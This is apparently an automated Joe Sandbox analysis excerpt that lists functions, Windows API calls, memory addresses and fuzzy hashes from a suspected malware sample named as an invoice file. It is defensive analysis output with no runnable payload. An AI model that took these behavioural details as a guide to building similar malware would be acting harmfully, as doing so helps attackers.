                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                            • String ID:
                                                                            • API String ID: 2108273632-0
                                                                            • Opcode ID: 16dd7a1db407f1a62cfea5f23651632d2275afa76a26e0228c16edaf46a3ad96
                                                                            • Instruction ID: a6851131f4271cb6b1f9739411e58f9ce3cdaf22c697ce0b7f9f9e50c1220728
                                                                            • Opcode Fuzzy Hash: 16dd7a1db407f1a62cfea5f23651632d2275afa76a26e0228c16edaf46a3ad96
                                                                            • Instruction Fuzzy Hash: 4831E831D0066AEFDB25DFB0EC44BB67BACAB01720F140166E561C71A1E7359889F761
                                                                            Function 00F28A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00F28A30
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00F28ADA
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F28AE2
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00F28AF0
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F28AF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 6a918bc73e14557ccc074670d20caa1b32be73f20cd811e052e9739b9d85cfb7
                                                                            • Instruction ID: 18a8c0d8665a8c89b47fde52c7cb3258646e99746e3032a67f070ea7aaca060b
                                                                            • Opcode Fuzzy Hash: 6a918bc73e14557ccc074670d20caa1b32be73f20cd811e052e9739b9d85cfb7
                                                                            • Instruction Fuzzy Hash: 4B31F171901229EBCB00CFA8E94CA9E3BB5EB05326F104229F925E71D0CBB49915EF90
                                                                            Function 00F2B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00F2B204
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F2B221
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F2B259
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F2B27F
                                                                            • _wcsstr.LIBCMT ref: 00F2B289
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            • Opcode ID: 0767129a900802159a77149dbc91a54bdf38ceacdcfdfbeaa6fcdc03a4695fe6
                                                                            • Instruction ID: 7adc288e390a0512b98b21bdaf411644fbb972d703f4d70b5d4e8bf8e22e9810
                                                                            • Opcode Fuzzy Hash: 0767129a900802159a77149dbc91a54bdf38ceacdcfdfbeaa6fcdc03a4695fe6
                                                                            • Instruction Fuzzy Hash: E921F532604314BBEB169B75AC09E7F7B98DF49720F104169FD04DA1A1EB619C40A2A0
                                                                            Function 00F5B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5B192
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F5B1B7
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F5B1CF
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00F5B1F8
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F40E90,00000000), ref: 00F5B216
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: 102985c3b5809e4fd4917527cc64d606884b1b8568168329dd95d621a2cd586e
                                                                            • Instruction ID: 7c104a7b9e936134136c9c0ae92b9475e07768ee459ecca87e553cae2a9c7548
                                                                            • Opcode Fuzzy Hash: 102985c3b5809e4fd4917527cc64d606884b1b8568168329dd95d621a2cd586e
                                                                            • Instruction Fuzzy Hash: 49218071910659AFCB219F38DC18A6A3BA4EB05772F144729BE32D71E0E7309815EB90
                                                                            Function 00F29307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29320
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29352
                                                                            • __itow.LIBCMT ref: 00F2936A
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29392
                                                                            • __itow.LIBCMT ref: 00F293A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow$_memmove
                                                                            • String ID:
                                                                            • API String ID: 2983881199-0
                                                                            • Opcode ID: 4d81f31901b120caf491cfdf1dae9e10df67791534cb9a90f2b7d398c1422ed0
                                                                            • Instruction ID: db0eecd88e1991646e9173bf2661897e3e24bb87f5a029f9b715911329c2af23
                                                                            • Opcode Fuzzy Hash: 4d81f31901b120caf491cfdf1dae9e10df67791534cb9a90f2b7d398c1422ed0
                                                                            • Instruction Fuzzy Hash: A121DA31B042186BDB10EBA49C85EEE7BEDEB48720F045025FE45E72D1D6F0CD45A7A1
                                                                            Function 00F45A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00F45A6E
                                                                            • GetForegroundWindow.USER32 ref: 00F45A85
                                                                            • GetDC.USER32(00000000), ref: 00F45AC1
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00F45ACD
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00F45B08
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 117b28ab729fea1e8aab302d7f6e03f5c6ea37f3f4622e73435199ecb958acf8
                                                                            • Instruction ID: b4f6b3159fcd289e20077579927cfff18d4aa164e891be012a186d3de0a4f402
                                                                            • Opcode Fuzzy Hash: 117b28ab729fea1e8aab302d7f6e03f5c6ea37f3f4622e73435199ecb958acf8
                                                                            • Instruction Fuzzy Hash: B421C335A00208AFD704EF64DC88AAABBF5EF48751F148079F909D7362CB74AC05EB90
                                                                            Function 00ED12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED134D
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED135C
                                                                            • BeginPath.GDI32(?), ref: 00ED1373
                                                                            • SelectObject.GDI32(?,00000000), ref: 00ED139C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 09ccb02ba970757fe28264aec26fa65420326420be08a7280b3d054646533d3e
                                                                            • Instruction ID: 56622374084a9d2849e63f4dba13a9115e37d50d9a09fd85916ca989906dc846
                                                                            • Opcode Fuzzy Hash: 09ccb02ba970757fe28264aec26fa65420326420be08a7280b3d054646533d3e
                                                                            • Instruction Fuzzy Hash: A2213E3080170CEFDB129F25DC4476D7BA8EB10B26F194297F911A62B0D7719996EF90
                                                                            Function 00F2BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 6db85577dcd2145786bbc04e1d5041c7fcae9a333a588cd077a885d85689e4c9
                                                                            • Instruction ID: 9fdd38f7d2a765346e77fdd9bcb6e6220e71b18767d37e0c8bfc6403443608ed
                                                                            • Opcode Fuzzy Hash: 6db85577dcd2145786bbc04e1d5041c7fcae9a333a588cd077a885d85689e4c9
                                                                            • Instruction Fuzzy Hash: 8C01B57264152DBBD2046B117D42FFBB75CDE713A8B044021FE15A6383EB51DE10A2A1
                                                                            Function 00F34A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F34ABA
                                                                            • __beginthreadex.LIBCMT ref: 00F34AD8
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00F34AED
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F34B03
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F34B0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: be3c2edec0bf4aa0f29e487b0ef8bc2a36c00e928f8a4199942710aa89290d19
                                                                            • Instruction ID: 70ae6f6e1cf9c4c469f71112efea9dd52949c2446672252aaaea433747e8b8e2
                                                                            • Opcode Fuzzy Hash: be3c2edec0bf4aa0f29e487b0ef8bc2a36c00e928f8a4199942710aa89290d19
                                                                            • Instruction Fuzzy Hash: 9411047690570CBBC7019FB8AC08A9B7FACEB85331F1442AAF914D3250D671E904ABA0
                                                                            Function 00F28202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F2821E
                                                                            • GetLastError.KERNEL32(?,00F27CE2,?,?,?), ref: 00F28228
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00F27CE2,?,?,?), ref: 00F28237
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00F27CE2), ref: 00F2823E
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F28255
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 883493501-0
                                                                            • Opcode ID: c8d1300fea7ab1671d0d8ac6a90d5f2cc72beddc9f712f27f31d6c88870cae9c
                                                                            • Instruction ID: b4cad7cae34bbde921f6487bb7e482c1063faa5e9cabac3bbee4bfd86cc1122a
                                                                            • Opcode Fuzzy Hash: c8d1300fea7ab1671d0d8ac6a90d5f2cc72beddc9f712f27f31d6c88870cae9c
                                                                            • Instruction Fuzzy Hash: 6E016271601718FFDB104FA5EC48D6B7B6CEF857A57500469F909C3160DA318C05EA60
                                                                            Function 00F2710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CLSIDFromProgID.COMBASE ref: 00F27127
                                                                            • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F27142
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27044,80070057,?,?), ref: 00F27150
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F27160
                                                                            • CLSIDFromString.COMBASE(?,?), ref: 00F2716C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: 180348b366163e6bcba542d08907999aaf970d1e20576e54a63d77e38e4f3a8c
                                                                            • Instruction ID: a967f9d22dd035f97dddb25b28af1b6b04163468b89b16b764ab483c9fb7992b
                                                                            • Opcode Fuzzy Hash: 180348b366163e6bcba542d08907999aaf970d1e20576e54a63d77e38e4f3a8c
                                                                            • Instruction Fuzzy Hash: 96018472A01328BBDB115F64EC44BAA7BADEF44763F1400A4FE04D2260D731DD50ABA0
                                                                            Function 00F35244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35260
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F3526E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35276
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F35280
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: 28c87e0b4f8259df83cc647d7ae139f10474a29d3342d199349e80ebd32b06f7
                                                                            • Instruction ID: c025e873d1226743e56895dc9e2dfb9889dd42339d3717ec7814037a0e6d1a9d
                                                                            • Opcode Fuzzy Hash: 28c87e0b4f8259df83cc647d7ae139f10474a29d3342d199349e80ebd32b06f7
                                                                            • Instruction Fuzzy Hash: 49012971D01A1DDBCF00EFE4EC49AEEBB78FB49B22F400596EA45B2191CB309554A7A1
                                                                            Function 00F2810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28121
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F2812B
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2813A
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F28141
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28157
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 47921759-0
                                                                            • Opcode ID: a68df41e5afafd05af5024f4985186ca5f915879a610f998b28d6fee8e78180c
                                                                            • Instruction ID: 22a2a5506358aac62217277715b37db35b2a540d7bd84f0d58e4c12d412fbf85
                                                                            • Opcode Fuzzy Hash: a68df41e5afafd05af5024f4985186ca5f915879a610f998b28d6fee8e78180c
                                                                            • Instruction Fuzzy Hash: 99F06271602328AFEB110FA5EC8DE6B3BACFF497A5B040065FA45C7190CB619D56EA60
                                                                            Function 00F2C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F2C1F7
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F2C20E
                                                                            • MessageBeep.USER32(00000000), ref: 00F2C226
                                                                            • KillTimer.USER32(?,0000040A), ref: 00F2C242
                                                                            • EndDialog.USER32(?,00000001), ref: 00F2C25C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 16c20c5bcd9057950e95b6fd206f53e52e04a13a6cabff10c790e3e6c62e8a63
